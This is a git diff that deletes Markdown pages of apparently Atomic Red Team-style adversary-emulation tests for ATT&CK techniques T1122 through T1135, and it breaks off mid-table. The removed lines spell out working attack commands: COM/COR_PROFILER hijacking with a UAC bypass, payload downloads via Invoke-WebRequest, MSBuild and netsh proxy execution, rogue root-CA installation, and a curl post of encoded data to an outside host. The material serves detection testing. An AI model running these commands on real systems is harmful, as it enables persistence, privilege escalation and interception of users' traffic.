diff --git a/Atomic_Threat_Coverage/Triggers/T1122.md b/Atomic_Threat_Coverage/Triggers/T1122.md
deleted file mode 100644
index 3d8cd3a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1122.md
+++ /dev/null
@@ -1,175 +0,0 @@
-# T1122 - Component Object Model Hijacking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1122)
-<blockquote>The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER](#atomic-test-1---com-hijack-leveraging-user-scope-cor_profiler)
-
-- [Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER](#atomic-test-2---com-hijack-leveraging-system-scope-cor_profiler)
-
-- [Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER](#atomic-test-3---com-hijack-leveraging-registry-free-process-scope-cor_profiler)
-
-
-<br/>
-
-## Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
-Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
-| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-START MMC.EXE EVENTVWR.MSC
-```
-
-#### Cleanup Commands:
-```powershell
-Write-Host "Removing registry keys" -ForegroundColor Cyan
-Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
-Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
-Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
-Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: #{file_name} must be present
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
-Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
-| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Write-Host "Creating system environment variables" -ForegroundColor Cyan
-New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-```
-
-#### Cleanup Commands:
-```powershell
-Write-Host "Removing system environment variables" -ForegroundColor Cyan
-Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force | Out-Null
-Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force | Out-Null
-Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force | Out-Null
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: #{file_name} must be present
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
-Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
-| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$env:COR_ENABLE_PROFILING = 1
-$env:COR_PROFILER = '#{clsid_guid}'
-$env:COR_PROFILER_PATH = '#{file_name}'
-POWERSHELL -c 'Start-Sleep 1'
-```
-
-#### Cleanup Commands:
-```powershell
-$env:COR_ENABLE_PROFILING = 0
-$env:COR_PROFILER = ''
-$env:COR_PROFILER_PATH = ''
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: #{file_name} must be present
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1123.md b/Atomic_Threat_Coverage/Triggers/T1123.md
deleted file mode 100644
index a9664ba..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1123.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# T1123 - Audio Capture
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1123)
-<blockquote>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
-
-Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - using device audio capture commandlet](#atomic-test-1---using-device-audio-capture-commandlet)
-
-
-<br/>
-
-## Atomic Test #1 - using device audio capture commandlet
-[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1124.md b/Atomic_Threat_Coverage/Triggers/T1124.md
deleted file mode 100644
index d21eddd..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1124.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# T1124 - System Time Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1124)
-<blockquote>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
-
-An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - System Time Discovery](#atomic-test-1---system-time-discovery)
-
-- [Atomic Test #2 - System Time Discovery - PowerShell](#atomic-test-2---system-time-discovery---powershell)
-
-
-<br/>
-
-## Atomic Test #1 - System Time Discovery
-Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| computer_name | computer name to query | string | localhost|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net time \\#{computer_name}
-w32tm /tz
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Time Discovery - PowerShell
-Identify the system time via PowerShell. Upon execution, the system time will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-Date
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1126.md b/Atomic_Threat_Coverage/Triggers/T1126.md
deleted file mode 100644
index cb16fc8..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1126.md
+++ /dev/null
@@ -1,104 +0,0 @@
-# T1126 - Network Share Connection Removal
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1126)
-<blockquote>Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)
-
-Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Add Network Share](#atomic-test-1---add-network-share)
-
-- [Atomic Test #2 - Remove Network Share](#atomic-test-2---remove-network-share)
-
-- [Atomic Test #3 - Remove Network Share PowerShell](#atomic-test-3---remove-network-share-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Add Network Share
-Add a Network Share utilizing the command_prompt
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| share_name | Share to add. | string | &#92;&#92;test&#92;share|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net use c: #{share_name}
-net share test=#{share_name} /REMARK:"test share" /CACHE:No
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Remove Network Share
-Removes a Network Share utilizing the command_prompt
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| share_name | Share to remove. | string | &#92;&#92;test&#92;share|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net share #{share_name} /delete
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Remove Network Share PowerShell
-Removes a Network Share utilizing PowerShell
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| share_name | Share to remove. | string | &#92;&#92;test&#92;share|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Remove-SmbShare -Name #{share_name}
-Remove-FileShare -Name #{share_name}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1127.md b/Atomic_Threat_Coverage/Triggers/T1127.md
deleted file mode 100644
index 63b7321..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1127.md
+++ /dev/null
@@ -1,83 +0,0 @@
-# T1127 - Trusted Developer Utilities
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127)
-<blockquote>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.
-
-### MSBuild
-
-MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild) 
-
-Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: LOLBAS Msbuild)
-
-### DNX
-
-The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft. 
-
-An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)
-
-### RCSI
-
-The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)
-
-C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)
-
-### WinDbg/CDB
-
-WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.
-
-An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)
-
-It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
-
-### Tracker
-
-The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)
-
-An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: LOLBAS Tracker)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks)
-
-
-<br/>
-
-## Atomic Test #1 - MSBuild Bypass Using Inline Tasks
-Executes the code in a project file using. C# Example
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1127&#92;src&#92;T1127.csproj|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Project file must exist on disk at specified location (#{filename})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{filename}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#{filename}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1128.md b/Atomic_Threat_Coverage/Triggers/T1128.md
deleted file mode 100644
index ff76c52..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1128.md
+++ /dev/null
@@ -1,42 +0,0 @@
-# T1128 - Netsh Helper DLL
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1128)
-<blockquote>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
-
-Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)
-
-Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Netsh Helper DLL Registration](#atomic-test-1---netsh-helper-dll-registration)
-
-
-<br/>
-
-## Atomic Test #1 - Netsh Helper DLL Registration
-Netsh interacts with other operating system components using dynamic-link library (DLL) files
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| helper_file | Path to DLL | Path | C:&#92;Path&#92;file.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-netsh.exe add helper #{helper_file}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1130.md b/Atomic_Threat_Coverage/Triggers/T1130.md
deleted file mode 100644
index c64d7f8..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1130.md
+++ /dev/null
@@ -1,199 +0,0 @@
-# T1130 - Install Root Certificate
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1130)
-<blockquote>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
-
-Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)
-
-Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)
-
-Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)
-
-In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Install root CA on CentOS/RHEL](#atomic-test-1---install-root-ca-on-centosrhel)
-
-- [Atomic Test #2 - Install root CA on Debian/Ubuntu](#atomic-test-2---install-root-ca-on-debianubuntu)
-
-- [Atomic Test #3 - Install root CA on macOS](#atomic-test-3---install-root-ca-on-macos)
-
-- [Atomic Test #4 - Install root CA on Windows](#atomic-test-4---install-root-ca-on-windows)
-
-
-<br/>
-
-## Atomic Test #1 - Install root CA on CentOS/RHEL
-Creates a root CA with openssl
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
-| cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-openssl genrsa -out #{key_filename} 4096
-openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
-
-if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
-then
-  cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
-else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
-  cp rootCA.crt /etc/pki/ca-trust/source/anchors/
-  update-ca-trust
-fi
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Install root CA on Debian/Ubuntu
-Creates a root CA with openssl
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
-| cert_filename | CA file name | Path | rootCA.crt|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-mv #{cert_filename} /usr/local/share/ca-certificates
-echo sudo update-ca-certificates
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Verify the certificate exists. It generates if not on disk.
-##### Check Prereq Commands:
-```cmd
-if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```cmd
-if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
-openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Install root CA on macOS
-Creates a root CA with openssl
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
-| cert_filename | CA file name | Path | rootCA.crt|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Verify the certificate exists. It generates if not on disk.
-##### Check Prereq Commands:
-```cmd
-if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```cmd
-if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
-openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Install root CA on Windows
-Creates a root CA with Powershell
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| pfx_path | Path of the certificate | Path | rootCA.cer|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
-Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
-```
-
-#### Cleanup Commands:
-```cmd
-$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
-Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
-Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Verify the certificate exists. It generates if not on disk.
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{cert_filename}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
-Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path}
-Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1132.md b/Atomic_Threat_Coverage/Triggers/T1132.md
deleted file mode 100644
index e978435..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1132.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# T1132 - Data Encoding
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1132)
-<blockquote>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64,  MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Base64 Encoded data.](#atomic-test-1---base64-encoded-data)
-
-
-<br/>
-
-## Atomic Test #1 - Base64 Encoded data.
-Utilizing a common technique for posting base64 encoded data.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| destination_url | Destination URL to post encoded data. | string | redcanary.com|
-| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo -n 111-11-1111 | base64
-curl -XPOST #{base64_data}.#{destination_url}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1135.md b/Atomic_Threat_Coverage/Triggers/T1135.md
deleted file mode 100644
index 7b04c29..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1135.md
+++ /dev/null
@@ -1,146 +0,0 @@
-# T1135 - Network Share Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1135)
-<blockquote>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
-
-### Windows
-
-File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)
-
-[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.
-
-Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.
-
-### Mac
-
-On Mac, locally mounted shares can be viewed with the <code>df -aH</code> command.
-
-### Cloud
-
-Cloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Network Share Discovery](#atomic-test-1---network-share-discovery)
-
-- [Atomic Test #2 - Network Share Discovery command prompt](#atomic-test-2---network-share-discovery-command-prompt)
-
-- [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell)
-
-- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives)
-
-
-<br/>
-
-## Atomic Test #1 - Network Share Discovery
-Network Share Discovery
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
